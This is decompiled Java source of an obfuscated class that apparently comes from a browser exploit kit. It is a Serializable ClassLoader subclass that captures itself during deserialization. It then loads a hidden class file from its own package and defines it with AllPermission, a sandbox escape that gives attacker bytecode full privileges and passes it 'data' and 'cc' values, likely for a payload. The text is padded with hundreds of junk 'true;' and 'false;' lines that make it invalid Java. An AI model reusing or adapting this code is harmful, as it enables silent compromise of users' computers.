// 
// Decompiled by Procyon v0.5.30
// 

package sklif;

import java.security.PermissionCollection;
import java.security.ProtectionDomain;
import java.security.CodeSource;
import java.security.Permission;
import java.security.AllPermission;
import java.security.Permissions;
import java.security.cert.Certificate;
import java.net.URL;
import java.lang.reflect.Field;
import java.io.InputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;

public class Hirwfee extends ClassLoader implements Serializable
{
    private static final long serialVersionUID = 6812622870313961944L;
    public static Hirwfee instance;
    
    private void writeObject(final ObjectOutputStream objectOutputStream) throws IOException, ClassNotFoundException {
        false;
        false;
        false;
        false;
        true;
        false;
        true;
        objectOutputStream.defaultWriteObject();
        true;
        false;
        false;
        false;
        false;
        false;
        true;
        true;
        true;
        true;
        false;
        false;
        true;
        true;
    }
    
    private void readObject(final ObjectInputStream objectInputStream) throws IOException, ClassNotFoundException {
        true;
        true;
        false;
        true;
        false;
        Hirwfee.instance = this;
        true;
        true;
        true;
        true;
        true;
        false;
        true;
        objectInputStream.defaultReadObject();
        true;
        false;
        false;
        true;
        true;
        true;
        true;
        true;
    }
    
    public void __u(final String s, final String s2) throws IOException {
        false;
        false;
        true;
        false;
        true;
        false;
        false;
        true;
        true;
        true;
        false;
        false;
        false;
        true;
        false;
        false;
        true;
        true;
        false;
        false;
        false;
        false;
        true;
        true;
        true;
        true;
        true;
        true;
        false;
        true;
        false;
        true;
        true;
        false;
        true;
        try {
            true;
            false;
            true;
            false;
            true;
            false;
            false;
            false;
            true;
            true;
            true;
            true;
            false;
            true;
            false;
            false;
            true;
            false;
            false;
            true;
            false;
            final ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            false;
            true;
            true;
            false;
            false;
            false;
            false;
            false;
            true;
            false;
            final byte[] array = new byte[8192];
            false;
            false;
            true;
            true;
            true;
            false;
            true;
            true;
            false;
            true;
            true;
            false;
            false;
            false;
            false;
            true;
            false;
            false;
            final String replace = "KsKKKKklif".replace("K", "").replace('.', '/');
            true;
            true;
            true;
            false;
            true;
            false;
            false;
            false;
            true;
            false;
            true;
            true;
            false;
            false;
            true;
            final InputStream resourceAsStream = this.getClass().getResourceAsStream("e/".replace("e", "") + replace + "/Hkkkikydckkkkxkkedkk.kkkkkkkkcklasks".replace("k", ""));
            true;
            false;
            true;
            true;
            true;
            true;
            true;
            false;
            true;
            false;
            false;
            true;
            false;
            true;
            true;
            false;
            false;
            true;
            true;
            false;
            true;
            true;
            false;
            true;
            true;
            true;
            false;
            int read;
            while ((read = resourceAsStream.read(array)) > 0) {
                false;
                false;
                false;
                false;
                true;
                true;
                false;
                false;
                byteArrayOutputStream.write(array, 0, read);
                true;
                true;
                true;
                false;
                false;
                true;
                true;
                true;
            }
            false;
            false;
            false;
            true;
            true;
            false;
            false;
            true;
            true;
            true;
            true;
            true;
            false;
            false;
            true;
            false;
            false;
            true;
            final byte[] byteArray = byteArrayOutputStream.toByteArray();
            true;
            false;
            true;
            false;
            true;
            true;
            false;
            false;
            true;
            true;
            true;
            false;
            true;
            false;
            true;
            false;
            false;
            false;
            final Class minitClass = this.minitClass(byteArray);
            false;
            true;
            true;
            false;
            false;
            true;
            true;
            true;
            false;
            true;
            false;
            false;
            false;
            true;
            true;
            true;
            true;
            false;
            false;
            true;
            true;
            true;
            if (minitClass != null) {
                false;
                true;
                true;
                true;
                true;
                final Field field = minitClass.getField("d@@@ata@@@".replace("@", ""));
                false;
                false;
                false;
                true;
                true;
                true;
                true;
                false;
                final Field field2 = minitClass.getField("cffffc".replace("f", ""));
                false;
                true;
                true;
                false;
                true;
                false;
                true;
                false;
                false;
                false;
                false;
                true;
                final Object instance = minitClass.newInstance();
                true;
                true;
                true;
                false;
                false;
                true;
                true;
                true;
                false;
                field.set(instance, s);
                false;
                true;
                false;
                false;
                false;
                field2.set(instance, s2);
                true;
                false;
                false;
                false;
                true;
                true;
                false;
                false;
                false;
                minitClass.newInstance();
                true;
                true;
                false;
                true;
                true;
                true;
                false;
                false;
                true;
                false;
                true;
            }
            true;
            true;
            true;
            true;
            true;
            false;
            true;
            false;
            true;
            true;
            true;
            false;
            false;
            true;
            true;
            false;
            true;
        }
        catch (Exception ex) {
            false;
            false;
            true;
            true;
            false;
            true;
            false;
            true;
            false;
            false;
            false;
            true;
            true;
            false;
            false;
            true;
            false;
            true;
            true;
            false;
            true;
            true;
            false;
            false;
            false;
        }
        false;
        false;
        false;
        false;
        false;
        false;
        false;
        true;
        true;
        false;
        false;
        false;
        false;
    }
    
    public Class minitClass(final byte[] array) throws IOException {
        false;
        false;
        true;
        true;
        false;
        false;
        false;
        true;
        false;
        false;
        false;
        false;
        true;
        true;
        true;
        false;
        true;
        true;
        final URL url = new URL("file:777/777/7/".replace("7", ""));
        false;
        false;
        false;
        true;
        true;
        false;
        false;
        true;
        false;
        false;
        false;
        final Certificate[] array2 = new Certificate[0];
        true;
        true;
        false;
        false;
        true;
        false;
        false;
        false;
        true;
        final Permissions permissions = new Permissions();
        true;
        true;
        true;
        false;
        true;
        true;
        permissions.add(new AllPermission());
        false;
        false;
        false;
        true;
        true;
        false;
        false;
        true;
        false;
        false;
        final ProtectionDomain protectionDomain = new ProtectionDomain(new CodeSource(url, array2), permissions);
        true;
        true;
        true;
        false;
        false;
        false;
        false;
        false;
        true;
        false;
        true;
        false;
        true;
        true;
        false;
        true;
        false;
        return this.defineClass("sklif.Hiydcxed", array, 0, array.length, protectionDomain);
    }
    
    static {
        Hirwfee.instance = null;
    }
}
